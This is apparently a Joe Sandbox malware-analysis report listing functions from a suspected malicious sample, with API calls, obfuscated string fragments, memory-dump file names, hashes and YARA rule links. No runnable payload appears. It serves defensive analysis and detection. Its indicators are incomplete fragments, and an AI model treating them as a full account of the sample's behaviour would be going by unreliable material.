                                                                                                                                                                                                                                                        • String ID: U8<'$\R5$xj;$~l]R$Min
                                                                                                                                                                                                                                                        • API String ID: 0-3051850807
                                                                                                                                                                                                                                                        • Opcode ID: 2cdb46d656b0e340be9525c7d9998e008964fbf0bf9c0f7881c2ba523a22db2e
                                                                                                                                                                                                                                                        • Instruction ID: 7e1d3cf1ba94d947a149ba38ae32c52c505927e3706d699b64e70b60cd67b5fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cdb46d656b0e340be9525c7d9998e008964fbf0bf9c0f7881c2ba523a22db2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43B2E4F3A0C2049FE304AE2DEC8577ABBE5EF94720F1A893DE6C4C7744E63558058696
                                                                                                                                                                                                                                                        Function 009A81CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009A84BD
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009A85B4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                        • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                        • Opcode ID: 547666e6703dae618f8d6e4c32f7ee6ac85d45aad480c6a6cdd9aa96bbd55f5e
                                                                                                                                                                                                                                                        • Instruction ID: 135122effed4f7d9b228a71cb729eda4a697b7a4acf6b4fa828b6784302cd929
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 547666e6703dae618f8d6e4c32f7ee6ac85d45aad480c6a6cdd9aa96bbd55f5e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1322EE7191C341CFD3249F29D880B2FBBE5BF8A310F194A6CE999572A1D735D901CB92
                                                                                                                                                                                                                                                        Function 009A83D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009A84BD
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009A85B4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                        • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                        • Opcode ID: d7feb143a88352cbb4b6c8e7e202f3a2d2377527024626037b71db3029b42e04
                                                                                                                                                                                                                                                        • Instruction ID: 9c699d5cca753d03f4428af0e175697fe94790ac39059ee3c87fa99bcf730f9e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7feb143a88352cbb4b6c8e7e202f3a2d2377527024626037b71db3029b42e04
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3012EF7191C381CFD3248F29D880B2BBBE5BF8A310F194A6CE999573A1D735D901CB92
                                                                                                                                                                                                                                                        Function 009A24E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                                                                                                        • API String ID: 0-1171452581
                                                                                                                                                                                                                                                        • Opcode ID: a38d7c6a4ffb17668dd2c6db5b103efe2396ee8ee99fca49b658d7d96f1a0e4b
                                                                                                                                                                                                                                                        • Instruction ID: 71a21d2318069933a7138a1be246c31ef65474d107b645198e8d00092071c230
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a38d7c6a4ffb17668dd2c6db5b103efe2396ee8ee99fca49b658d7d96f1a0e4b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC91F3B1A083009BD714DF68C891B67B7F5EFD6718F14882CF9898B291E375E905C792
                                                                                                                                                                                                                                                        Function 00998169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                                                                                                        • API String ID: 0-3257051659
                                                                                                                                                                                                                                                        • Opcode ID: a3908bd244e20bf81f41994a852738dcb60314724f913b0ea52fa307733f409c
                                                                                                                                                                                                                                                        • Instruction ID: 95936c29af75d99a1c2c29baf9cf86693c739e4a579a68844de82d1584c9cc4b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3908bd244e20bf81f41994a852738dcb60314724f913b0ea52fa307733f409c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5A14A72A183508BD714CF28C85276FB7D6FBC5318F598A3DE485D7391DA3889068782
                                                                                                                                                                                                                                                        Function 009AC9EB Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: EXCm$EXCm$_^]\$_^]\
                                                                                                                                                                                                                                                        • API String ID: 0-1657758763
                                                                                                                                                                                                                                                        • Opcode ID: 16687e0ef3703f012825ac5fac606f348e5e5af15fdd549bbdf9ffe239a82646
                                                                                                                                                                                                                                                        • Instruction ID: 29422a951d2db06500259efd7201425533ad1bf77e64b43644522163d385294a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16687e0ef3703f012825ac5fac606f348e5e5af15fdd549bbdf9ffe239a82646
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51C2B02086928BD725CF3981A0B73BBD2AF57304F1DC5ACC4D78F652DA34A985DB90
                                                                                                                                                                                                                                                        Function 009AA5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: VN$VN$i$i
                                                                                                                                                                                                                                                        • API String ID: 0-1885346908
                                                                                                                                                                                                                                                        • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                        • Instruction ID: ecb26594a541cad9d8b2b3dc3facff78857fd034a00c133f8f24de2d91806da7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B421C62154C3818BD3058E6580402AABBE7ABC7728F28565EE0F15B391E73BC909879B
                                                                                                                                                                                                                                                        Function 009F4983 Relevance: 4.3, Strings: 3, Instructions: 534COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /.7&$1o>7$1o>7
                                                                                                                                                                                                                                                        • API String ID: 0-1551524074
                                                                                                                                                                                                                                                        • Opcode ID: e32ca018c1d1e48539f9b4042b8de3918717f8bcb859af44bf6b4a69ef5d2a4f
                                                                                                                                                                                                                                                        • Instruction ID: 58967129216884e0a6e0261b56af09305a82af7c0755e25e439153b430dae36e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e32ca018c1d1e48539f9b4042b8de3918717f8bcb859af44bf6b4a69ef5d2a4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B02E2F3E146244BF3044E29DD89366B692EB94320F2F823C9E9CA77C5E97E9C054785
                                                                                                                                                                                                                                                        Function 009AA0CA Relevance: 4.1, Strings: 3, Instructions: 336COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .txt$<\hX$_^]\
                                                                                                                                                                                                                                                        • API String ID: 0-3117400391
                                                                                                                                                                                                                                                        • Opcode ID: c6ff343875e3d5ad465a184c8d300b0e666945904efa3e64a60fc2295ede424b
                                                                                                                                                                                                                                                        • Instruction ID: b2f19b907f14e7a331a555c277caaf89d37382e9eea7e938e7fa11635dfb56f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6ff343875e3d5ad465a184c8d300b0e666945904efa3e64a60fc2295ede424b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88C10F7190C381DFD7049F28D881A2ABBE2AFC6310F188A6CF4E5473A2D739D945DB52
                                                                                                                                                                                                                                                        Function 00A8A836 Relevance: 3.1, Strings: 2, Instructions: 589COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Xykw$j,}7
                                                                                                                                                                                                                                                        • API String ID: 0-1890311054
                                                                                                                                                                                                                                                        • Opcode ID: f4ec67cf8b928efbfb8d95b4b51e676cb4a6bed884ddc9fdd77e5f665be48e15
                                                                                                                                                                                                                                                        • Instruction ID: a6b0201c276232dd1e00f2b5acf91818619fee10dca13ab38b876a8867f323d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4ec67cf8b928efbfb8d95b4b51e676cb4a6bed884ddc9fdd77e5f665be48e15
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC12D2B3F106204BF3504D38DC983A6B692EBD4320F2B863C9E88AB7C5D97E5D094785
                                                                                                                                                                                                                                                        Function 00A563D4 Relevance: 3.0, Strings: 2, Instructions: 486COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
